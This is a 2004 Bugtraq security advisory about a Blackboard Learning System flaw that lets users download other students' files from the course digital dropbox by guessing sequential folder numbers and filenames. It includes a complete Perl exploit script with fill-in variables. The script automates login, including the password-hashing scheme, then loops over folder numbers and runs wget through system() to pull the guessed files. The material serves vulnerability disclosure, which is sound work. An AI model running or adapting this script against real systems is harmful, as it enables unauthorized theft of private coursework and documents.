lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040610201427.7801.qmail@www.securityfocus.com>
Date: 10 Jun 2004 20:14:27 -0000
From: Maarten Verbeek <system_error@...dora.be>
To: bugtraq@...urityfocus.com
Subject: Blackboard Learning System - Stealing documents out of the
    digital dropbox




Advisory:

Blackboard Learning System - Stealing documents out of the digital dropbox
==========================================================================


Blackboard
----------
The Blackboard Learning System is a Web-based server software platform that offers course management.
More information can be found on: http://www.blackboard.com/

Affected Systems
----------------
Blackboard Learning System - Basic Edition™ (Release 6) 

This is the only version on which i was able to test the bug. 
Probably more versions are affected.

Overview
--------
A bug in blackboard allows users to steal documents out of the digital dropbox of other users.


Details
-------
Each course has it's own digital dropbox.

it can be found for example in:
http://blackboard.nosite.org/courses/1/my_course/uploads/

The digital dropbox is a function in the blackboard system.
It can be found under a course/tools/digital dropbox
This function allows blackboard users to submit files to the course administrators.

When submitting a file into the digital dropbox, the users have 2 options:
-Add File: put's the file into the digital dropbox but doesn't sends it to the course administrators
-Submit File: put's a file into the digital dropbox and send it to the course administrators

(Sending the file wil probably send a notification that a file is dropped)

If a file is submitted it wil be dropped in a folder like this:
http://blackboard.nosite.org/courses/1/my_course/uploads//_19064_1/testfile.txt

For each file that is dropped, a new folder is created:
_19064_1

The number 19064 in this folder is an autonumber.
We can easily find the current number by just adding a file to the digital drop box.
This file won't be send to the course administrators.
Files in the folder don't have a form of security.
But we are unable to see which file is in the folder.

But since the software is created for educational purpose, filenames can be guessed easy.
Since schools often have rules for naming a file.

So if we change the URL, it is possible to get files out of other people's digital dropbox:
http://blackboard.nosite.org/courses/1/my_course/uploads//_19063_1/file_i_want.txt
http://blackboard.nosite.org/courses/1/my_course/uploads//_19062_1/file_i_want.txt
http://blackboard.nosite.org/courses/1/my_course/uploads//_19061_1/file_i_want.txt
...

By doing this we have a good chance to find files that we want.

------------------------------------------------------
	    		 killer
		       06/05/2004	
	      system_error_at_pandora.be		
	    http://www.mostly-harmless.nl/
------------------------------------------------------





Exploit Code:

#!/usr/bin/perl

use strict;
use LWP;
use URI;
use Digest::Perl::MD5 'md5_hex';
use MIME::Base64;

#################################################################
#                                                               #
#         fill in these 3 variables to your situation           #
#                                                               #
#################################################################       

my $url_to_bb = "http://blackboard.example.org/";
my $user     = 'username';
my $password = 'password';
my $encryption = 'md5'; # this may also be base64

#################################################################
# The code for the logging in onto blackboard.                  #
# I thank vandreadfull for providing me with this code          #
#################################################################

my @headers = ('User-Agent'      => 'SQL Injection Tester/1.1b (M & H)',
               'Accept-Language' => 'en-US',
               'Accept-Charset'  => 'iso-8859-1,*,utf-8',
               'Accept-Encoding' => '',
               'Accept'          => '*/*'
               );
my $browser = LWP::UserAgent->new(keep_alive => 1);
$browser->cookie_jar({});


print "logging in\n";

my $url = $url_to_bb;
print '.';
$_ = ($browser->get($url, @headers))->content;
#one more time, for some reason (probably a session or something) blackboard doesnt provide us with the one_time_token the first time
$_ = ($browser->get($url."webapps/login", @headers))->content;
my $string = $_;

# Process page to fetch hidden HTML form variables
my %postvars;
$postvars{login}    = 'Log In';
$postvars{password} = '';
while ($string =~ m{INPUT VALUE="(.*?)" NAME="(.*?)" TYPE="hidden"}g) {
    if ($2 ne 'password') {
$postvars{$2} = $1;
    }
}

# Set the username
$postvars{user_id}    = $user;
# Setting the password (md5 or base64)
if ($encryption eq 'md5') {
$_ = $string;
/<INPUT VALUE=\"([^"]*)\" NAME=\"one\_time\_token\"/;
my $one_time_token = $1; 
$password = md5_hex($password);
$password =~y/a-z/A-Z/;
$password = md5_hex("$password$one_time_token");
$password =~y/a-z/A-Z/;
$postvars{encoded_pw} = $password; 
}
if ($encryption eq 'base64') {
$postvars{encoded_pw} = encode_base64($password);
}

# Post login
$url = $url_to_bb."webapps/login";
print '.';
my $response = $browser->post($url, [%postvars], @headers);

# Do another refresh
$_ = $response->content;
$_ =~ m{document\.location\.replace\(\'(.*?)\'\)} || exit 1;
$url = $url_to_bb . $1;
print '.';
$browser->get($url, @headers)->content;

print "logged in\n";


#################################################################
#                                                               # 
#    Fill in these 3 variables according to your needs          #
#                                 #
#################################################################

my $path="http://blackboard.example.org/courses/1/my_course/uploads//_19063_1/";
my @file=("test.txt","doc2.txt");
my $loop=10;
         

#################################################################
#        The code for exploiting the vulnerability              # 
#################################################################

my $file;
my $wget;

$_=reverse($path);
/_(.*?)_/;
my $autocount=reverse($1);

my $orig_count=$autocount;

$wget="wget -q ";
for(my $t=0;$t<$loop;$t++) {
    $autocount--;
    $url=$path;
    $url=~ s/$orig_count/$autocount/;
    foreach $file (@file) {
system("$wget$url$file");
    }
}
print("\nDone, if the files existed they should be in this directory.\n\nkiller 2004\nhttp://www.mostly-harmless.nl/");


Kind regards

killer
http://www.mostly-harmless.nl







Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ